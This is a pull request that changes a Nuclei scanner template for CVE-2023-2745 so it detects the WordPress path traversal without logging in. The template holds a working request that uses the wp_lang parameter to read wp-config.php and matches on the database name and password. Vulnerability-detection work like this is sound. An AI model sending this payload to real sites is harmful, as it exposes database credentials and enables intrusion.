### PR TITLE
fix: remove auth requirement from CVE-2023-2745

### DIFF
--- a/http/cves/2023/CVE-2023-2745.yaml
+++ b/http/cves/2023/CVE-2023-2745.yaml
@@ -20,7 +20,7 @@ info:
     epss-score: 0.77479
     epss-percentile: 0.98989
   metadata:
-    max-request: 3
+    max-request: 2
     framework: wordpress
   tags: cve,cve2023,wpscan,disclosure,wp,wordpress,lfi,vuln
 
@@ -40,20 +40,12 @@ http:
 
   - raw:
       - |
-        POST /wp-login.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
-
-      - |
         GET /wp-login.php?wp_lang=../../../../../../../wp-config.php HTTP/1.1
         Host: {{Hostname}}
 
     matchers:
       - type: dsl
         dsl:
-          - 'contains_all(body_2, "DB_NAME", "DB_PASSWORD")'
-          - 'status_code_2 == 200'
+          - 'contains_all(body, "DB_NAME", "DB_PASSWORD")'
+          - 'status_code == 200'
         condition: and
-# digest: 4a0a00473045022100ea4801db49b3a6e0bbfd116b3d773d9604b850b1de01f48ddba84055220b3d840220051ef0fe3dac687320c1b39e3b368339c16bf72e2d63f0a73425085af38ce452:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
## Summary
- remove the unnecessary authenticated login request from the CVE-2023-2745 template
- switch the matcher to the remaining unauthenticated `wp_lang` response
- update `max-request` from 3 to 2 and drop the stale digest after modifying the template

## Validation
- `nuclei -validate -t http/cves/2023/CVE-2023-2745.yaml -duc`
- local mock WordPress-like target confirmed the template matches without requiring `username` or `password`
- independent content review confirmed the change is scoped to the false-negative in #16133

Closes #16133
